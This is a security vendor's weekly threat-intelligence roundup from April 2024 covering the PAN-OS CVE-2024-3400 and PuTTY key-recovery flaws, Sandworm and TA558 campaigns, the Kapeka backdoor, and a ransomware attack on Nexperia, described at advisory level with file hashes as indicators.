April 19: Top Threat Actors, Malware, Vulnerabilities and Exploits

Welcome to Picus Security's weekly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our new threat intelligence tool will enable you to identify threats targeting your region and sector, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

April 19: Latest Vulnerabilities, Exploits and Patches

Here are the top vulnerabilities and exploitations observed in the second and third weeks of April.

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

• Victim Sector: Technology

• Affected Products: PAN-OS operating system for Palo Alto Networks' security appliances

• Vulnerability: Command Injection Vulnerability

• Threat Actor: State-sponsored threat group UTA0218

• Actor Motivation: Financial Gain

• CVE: CVE-2024-3400

• Malware: UPSTYLE Backdoor

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651
  • SHA1: 988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9
  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

CVE-2024-3400 is a critical command injection vulnerability identified in PAN-OS, the operating system for Palo Alto Networks' security appliances, including their next-generation firewalls. 

Disclosed by Palo Alto Networks on April 12, 2024, this flaw, scored at 10.0 (Critical) on the CVSS scale, permits unauthenticated remote attackers to execute arbitrary commands with root privileges on affected devices. The vulnerability resides within the GlobalProtect feature's telemetry functionality, which improperly handles the SESSID variable in HTTP POST requests. Attackers can manipulate this vulnerability by crafting a malicious SESSID in an HTTP cookie, which then injects shell commands that are executed by the server.

Note that this vulnerability has already been exploited in the wild, as evidenced by the UPSTYLE backdoor deployed by threat actors using this exploit for sustained access into compromised systems.

Given its severity and potential to facilitate initial access, persistence, data exfiltration, or lateral movement within networks, organizations using affected PAN-OS versions are strongly advised to apply the provided patches without delay [1]. 

Critical PuTTY SSH Client Vulnerability Enables Recovery of Cryptographic Private Keys

• Victim Sector: Technology

• Affected Products: PuTTY Versions 0.68 through 0.80 

• Vulnerability: Unauthorized SSH Server Access

A vulnerability identified as CVE-2024-31497 in PuTTY versions 0.68 through 0.80 allows attackers with access to 60 cryptographic signatures to potentially recover the private keys used for their generation. PuTTY, a widely-used open-source terminal emulator that supports SSH, Telnet, SCP, and SFTP, is primarily utilized by system administrators and developers for remote server management via SSH from Windows-based clients.

This vulnerability stems from how PuTTY generates ECDSA nonces for the NIST P-521 curve, used in SSH authentication. Discovered by researchers Fabian Bäumer and Marcus Brinkmann from Ruhr University Bochum, the issue arises due to PuTTY's deterministic nonce generation method, originally designed to compensate for insufficient cryptographic random number generators on certain Windows versions. This method introduces a significant bias, especially problematic for the P-521 curve, leading to predictable values that could compromise private key security. Consequently, this could allow unauthorized SSH server access or enable attackers to impersonate developers by signing commits, raising the potential for severe security breaches including supply chain attacks.

April 19: Top Threat Actors Observed In Wild

Here are the top threat actors that were active in the second and third weeks of April.

IntelBroker Claims Space-Eyes Breach, Targeting US National Security Data

• Victim Location: United States

• Victim Organization: Space-Eyes

• Threat Actor: IntelBroker

• Threat Actor Motivation: Sensitive Information Exfiltration 

The cybersecurity community is currently monitoring a high-profile claim by the hacker known as "IntelBroker" regarding a significant breach at Space-Eyes, a Miami-based geospatial intelligence firm known for its close work with U.S. national security agencies. 

IntelBroker announced the breach on Breach Forums, claiming that it took merely 10-15 minutes to infiltrate the firm's defenses and access highly sensitive data. This data allegedly includes confidential documents and correspondences integral to U.S. national security, involving key government clients such as the Department of Justice, Department of Homeland Security, and the National Geospatial-Intelligence Agency.

(Screenshot credit: Hackread.com)

The implications of this breach are profound, as the exposed data reportedly encompasses detailed profiles of individuals and entities denied or sanctioned under U.S. law, potentially affecting national security operations. Space-Eyes has yet to confirm the breach officially, but the CISA has been notified, and investigations are underway. This incident echoes a previous breach by IntelBroker against Acuity Inc., another federal contractor, suggesting a pattern in targeting security-sensitive entities.

The Russian APT Group Sandworm Masquerading as a Hacktivist Group in Water Utility Breach

• Threat Actor: Sandworm (a.k.a APT44) Hacking Group

• Threat Actor Origin: Russia

• Actor Motivation: Sensitive Information Exfiltration for GRU

• Victim Location: U.S. Poland, France

• Sectors: Infrastructure

The Russian hacking group known as Sandworm (APT44), which operates under the auspices of Russian Military Intelligence (GRU), has been employing a deceptive tactic by masquerading as hacktivist groups to conduct its cyber operations [2]. This strategy involves creating multiple online personas and using these identities to manage narratives that align with Russian interests. Sandworm, which has been active since 2009 and is officially part of the Main Centre for Special Technologies within the GRU, is known for its versatility in cyber warfare, employing methods ranging from phishing and credential harvesting to exploiting vulnerabilities and conducting supply-chain attacks.

Recently, Sandworm has utilized at least three Telegram channels—XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek—to promote its activities and spread misinformation. These channels, though seemingly independent, are closely linked to Sandworm's operations, with some of them found to have been created from infrastructure directly tied to the group. For example, CyberArmyofRussia_Reborn, which claimed responsibility for cyberattacks against water utilities in the U.S. and Poland and a hydroelectric facility in France [3], was found to use the same infrastructure for exfiltrating data from its targets.

The shift in Sandworm's activities to include the use of hacktivist facades suggests an adaptation in tactics, likely aimed at obfuscating their operations and enhancing the psychological impact of their attacks. 

TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks

The threat actor identified as TA558 has been employing steganography—an advanced technique for hiding malicious code within images—to distribute a variety of malware, including Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm [4]. This method was detailed in a report by Russian cybersecurity firm Positive Technologies, which revealed that TA558 embedded malicious Visual Basic Scripts (VBS), PowerShell code, and RTF documents with exploits into image and text files. Dubbed SteganoAmor, the campaign predominantly targets sectors such as industrial, services, public utilities, electric power, and construction across Latin America, with additional attacks noted in Russia, Romania, and Turkey.

Moreover, TA558 has been observed launching Venom RAT through phishing campaigns aimed at organizations in Spain, Mexico, the United States, Colombia, Portugal, Brazil, the Dominican Republic, and Argentina [5]. These attacks typically start with a phishing email that includes a booby-trapped Microsoft Excel attachment exploiting the CVE-2017-11882 vulnerability in Equation Editor. This initial breach facilitates the download of a Visual Basic Script which then retrieves two images containing hidden, Base64-encoded components that deploy the Agent Tesla malware on the compromised system. Beyond just deploying malware, TA558 manipulates legitimate but compromised SMTP servers to send phishing emails, enhancing their seeming legitimacy and evading detection by email security gateways. Additionally, the group uses compromised FTP servers to store stolen data, demonstrating a sophisticated multi-vector approach to cyber espionage and data theft.

April 19: Latest Malware Attacks

Here are the malware attacks and campaigns that were active in the second and third weeks of April.

APT44 Is Deploying New 'Kapeka' Backdoor in Eastern European Attacks

• Victim Location: Estonia, Ukraine

• Threat Actor: Sandworm (APT44) Threat Group

• Actor Motivation: Cyber Espionage, Data Theft, Destructive Attack

• Malware: Kapeka

• Known IOCs

A new form of cyber threat, the Kapeka backdoor, has been identified targeting Eastern European countries including Estonia and Ukraine. This backdoor is attributed to the Russian APT group known as Sandworm, also tracked as APT44 or Seashell Blizzard. 

Finnish cybersecurity firm WithSecure [6], alongside Microsoft, revealed that Kapeka has been in use since at least mid-2022, serving both as an initial access tool and a sustainable access vector in victim networks. Designed as a Windows DLL, Kapeka masquerades as a Microsoft Word add-in, enhancing its stealth and making it difficult to detect. It features capabilities for remote command execution, data theft, and executing ransomware attacks, all controlled through C2 communications that use JSON for transmitting data. The backdoor supports dynamic updates from its C2 server, allowing continuous evolution to evade detection and remediation efforts. Notably, the deployment of Kapeka involves the use of compromised websites and the certutil utility, a legitimate tool exploited to fetch the malicious payload, indicative of the sophisticated nature of this APT's operations and its historical lineage connected to tools like GreyEnergy and BlackEnergy [7].

Nexperia, a Silicon-Based Processor Manufacturer, Suffers a Ransomware Attack

• Victim Sector: Technology

• Timeline of Activity: April 12, 2024

• Victim Organization: Nexperia

• Victim Location: Netherlands

• Threat Actor: Dunghill Group, Scattered Spider

• Actor Motivation: Sensitive Data Exfiltration, Financial Gain

Nexperia, a prominent manufacturer of silicon-based processors based in the Netherlands, recently suffered a significant ransomware attack orchestrated by a group identified as the Dunghill Group, also known as the DARK ANGELS RANSOMWARE GROUP [4]. 

During the attack on April 12, 2024, the group reportedly compromised Nexperia's production servers and exfiltrated over 1TB of critical data, including proprietary chip designs, R&D data, as well as personal and customer information from major clients like Huawei, SpaceX, and Apple Inc. In response, Nexperia has activated its business continuity plan to manage data recovery and has informed law enforcement authorities about the breach.

References

[1] P. Psirt, “CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect,” Palo Alto Networks Product Security Assurance, Apr. 12, 2024. Available: https://security.paloaltonetworks.com/CVE-2024-3400. [Accessed: Apr. 18, 2024]

[2] B. Toulas, “Russian Sandworm hackers pose as hacktivists in water utility breaches,” BleepingComputer, Apr. 17, 2024. Available: https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-pose-as-hacktivists-in-water-utility-breaches/. [Accessed: Apr. 18, 2024]

[3] A. Chadda, “Sandworm Group Shifts to Espionage Attacks, Hacktivist Personas,” Decipher, Apr. 17, 2024. Available: https://duo.com/decipher/sandworm-group-shifts-to-espionage-attacks-hacktivist-personas. [Accessed: Apr. 18, 2024]

[4] N. Goud, “Nexperia Ransomware attack and some details about American hackers spreading ransomware,” Cybersecurity Insiders, Apr. 15, 2024. Available: https://www.cybersecurity-insiders.com/nexperia-ransomware-attack-and-some-details-about-american-hackers-spreading-ransomware/. [Accessed: Apr. 18, 2024]

[5] 2024 newsroom Apr 16, “TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks,” The Hacker News, Apr. 16, 2024. Available: https://thehackernews.com/2024/04/ta558-hackers-weaponize-images-for-wide.html. [Accessed: Apr. 18, 2024]

[6] M. K. H. Nejad, “Kapeka: A novel backdoor spotted in Eastern Europe.” Available: https://labs.withsecure.com/publications/kapeka. [Accessed: Apr. 18, 2024]

[7] 2024 newsroom Apr 17, “Russian APT Deploys New ‘Kapeka’ Backdoor in Eastern European Attacks,” The Hacker News, Apr. 17, 2024. Available: https://thehackernews.com/2024/04/russian-apt-deploys-new-kapeka-backdoor.html. [Accessed: Apr. 18, 2024]